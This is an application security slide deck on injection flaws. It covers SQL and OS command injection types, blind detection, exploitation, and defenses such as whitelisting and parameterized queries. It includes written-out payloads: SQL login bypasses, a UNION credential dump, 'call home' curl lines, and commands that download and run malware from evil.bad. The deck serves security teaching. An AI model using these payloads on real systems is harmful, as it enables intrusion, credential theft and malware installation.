Injection is the number 1 attack category in the OWASP Top 10 and for good reason: injection flaws are extremely damaging because they allow an attacker to execute arbitrary commands, either on on the host running the application or on the database server. This Application Security Lesson will teach you what is Injection, types of Injection, explain how to find it, how to exploit it and how to prevent it.
6. Many Types of Injection
• SQL Injection - Ability to insert arbitrary SQL
commands in database queries
• NoSQL Injection – Ability to insert arbitrary
commands in a NoSQL DB query
• OS Command Injection – Ability to insert
arbitrary commands in shell calls
• LDAP Injection – Ability to alter the logic of
an LDAP Query
• XPath Injection – Ability to alter the logic of
an XPath search
• MORE: MX, ORM, OGNL,
• RELATED: JSON, XML, HTML?, HTTP
HEADER?
14. To sum all it up…
•Injection is the ability to insert arbitrary
commands into a string passed to a command
processor
•The type of injection takes the name of the
affected command processor: SQL, OS
Command, LDAP etc.
•SQL and OS Command the most widely exploited
25. To sum all it up…
•Recipe for Injection: Hazardous input
concatenated into a query or command
string
•command + input = injection
•replace(command, placeholder, input) =
injection
•format(command, input) = injection
28. SELECT * FROM users WHERE
name='''
/bin/sh –c '~/backup.sh
test".zip'
29.
30. Blind Injection
• Error is not displayed or
the error message is too
generic
"An internal error
has occurred"
• You may observe a
difference in the behavior
of the application
31. Error vs. No Error
• The application will show an "Internal Error" for a unenclosed quote "
• There will be no error if an enclosing quote is added, two quotes ""
$ /bin/sh -c '~/backup.sh test".zip'
/bin/sh: -c: line 0: unexpected EOF while looking for
matching `"'
/bin/sh: -c: line 1: syntax error: unexpected end of
file
$ /bin/sh -c '~/backup.sh test"".zip'
yay
32. Tautology
• Influence the logic of a query to be
always true or always false then
compare the outcome
SELECT * FROM users WHERE
id = 1 --returns one record
id = 1 or 1=1 --returns all
records (always true)
id = 1 and 2=1 --returns no
records (always false)
33. The ET Maneuver
• Especially in the case of OS injection you
could add commands that "call home"
• Some examples:
input';ping home.bad -c 1;echo '
input';curl home.bad; echo '
34. Burp Collaborator gives you a home
• Pro version of Burp creates dynamic
host names and reports on DNS
queries and HTTP requests
• Be careful what you send there
$ /bin/sh -c '~/backup.sh
test`curl
nofq92nxlhqs01t4rgwz5j84bvhl5a.bur
pcollaborator.net`.zip'
% Total % Received %
Xferd Average
35. Glass Box
Stacktrace:] with root cause
ERROR 42X01: Syntax error: Encountered
"'" at line 1, column 49.
at
org.apache.derby.iapi.error.StandardExce
ption.newException(Unknown Source)
at
org.apache.derby.iapi.error.StandardExce
ption.newException(Unknown Source)
at
org.apache.derby.impl.sql.compile.Parser
Impl.parseStatementOrSearchCondition(Unk
nown Source)
at
org.apache.derby.impl.sql.compile.Parser
Impl.parseStatement(Unknown Source)
at
org.apache.derby.impl.sql.GenericStateme
nt.prepMinion(Unknown Source)
• Access to the
application or server
logs (you're a developer
or tester)
• Tail the log and observe
the errors that occur
when inserting quotes
37. Using Automated Tools
Dynamic Analysis tools
• numerous payloads
intended to influence
application behavior
• OWASP ZAP
Static Analysis tools
• analyze the call graph in
the application code to
determine insecure
coding
38. To sum all it up…
•Unenclosed quotes break the
command/query
•Look for errors
•Look for behavior changes
•Call home
•Look for errors in logs
•Use automated tools such as OWASP ZAP
40. The Magic Credentials
•User names that get you logged into the
administrator account:
•admin'--
•admin' or '1'='1
• ' or '1'='1
41. The UNION keyword
In the case of SQL Injection the
UNION command is used to append
results from a sensitive table to the
impacted query.
SELECT articleId,
title, description
FROM transactions
WHERE userId=15125
UNION SELECT 1,
username, password
FROM users
articleId title description
2 "About Us" "This is the
about page"
3 "Home" "This is the
home page"
1 admin @dm!n
1 jdoe p@$$w0rd
42. Deploy Malware
Command Injection, but also SQL Injection are used to deploy
malware and reverse shells
• ping host.local`curl
http://evil.bad/malware.sh|/bin/sh`
• SELECT * FROM users; EXEC xp_cmdshell
'powershell -command Invoke-RestMethod -
Uri http://evil.bad/malware>malware.bat'
43. To sum all it up…
•Injection can be exploited in powerful
ways
•Break authentication
•Exfiltrate data
•Install reverse shells and malware
•Full impact of Confidentiality, Integrity and
Availability
47. Quotes Not Needed
• Majority of application
parameters are not intended
to contain quotes
• Many of them are not even
intended to contain Unicode
characters
• Parameters going into
database queries such as ID,
true/false, asc/desc have even
a smaller character set
Alphanumeric
Alphanumeric + .-_
48. Whitelisting vs. Blacklisting
•Blacklisting can be bypassed
• Encoding attacks
• Forgotten types of quotes
• Injection without quotes
• Remember the how many times
Shellshock was fixed?
49.
50. Unicode Validation
• One of the common misconceptions against whitelisting:
multi-language support
• Most programming languages even regular expressions (p)
will classify other language characters correctly
Character.isLetter("人") == true
Character.isLetter("û") == true
52. A Simple Multi-Purpose Function
isAlphanumOrEx("true")
isAlphanumOrEx("desc")
isAlphanumOrEx("21845816438168")
isAlphanumOrEx("0x0709750fa566")
isAlphanumOrEx("Cr2i7nHq6qiMEs")
isAlphanumOrEx("site.local",'.')
53. The Proper Response to an Injection Attack
• Error conditions can be used to detect injection but this error is
what you always want to see in response to hazardous characters
BAD REQUEST:
INVALID INPUT - MUST BE ALPHANUMERIC
56. How About the Irish?
•Names, comments, articles, free text require
quotes:
•O'Brien, don't, "putting things in quotes"
•While input whitelisting reduces the attack
surface, it cannot prevent all attacks
66. OWASP ESAPI
• ESAPI – The Enterprise Security API
• Open Source Library containing
security controls
• Written and tested by application
security experts
• Recognized by static analysis tools
67. Using Automated Tools
Intrusion Detection and Prevention (IDS/IPS) / Web
Application Firewall (WAS)
• automated blacklisting rules
• can be bypassed
• can alert
Runtime Analysis (RASP)
• instrument the application
• can detect the exploit and block it
68. To sum all it up…
•Input Whitelisting reduces the attack surface and
prevents many attack types
•Parameterized Commands handle situations where
hazardous chars are needed
•ORM Frameworks prevent mistakes
•OWASP ESAPI provides a set of handy security
functions
•IDS/IPS/WAF/RASP can alert and prevent some of the
attacks but not a replacement for secure coding.
69. Test Your Knowledge and get a Badge
• https://owasp.trendmicro.com
• SQL Injection Challenge
•Play code: In' or '1'='1' or 'jection
• Get a participation badge via
Badgr.io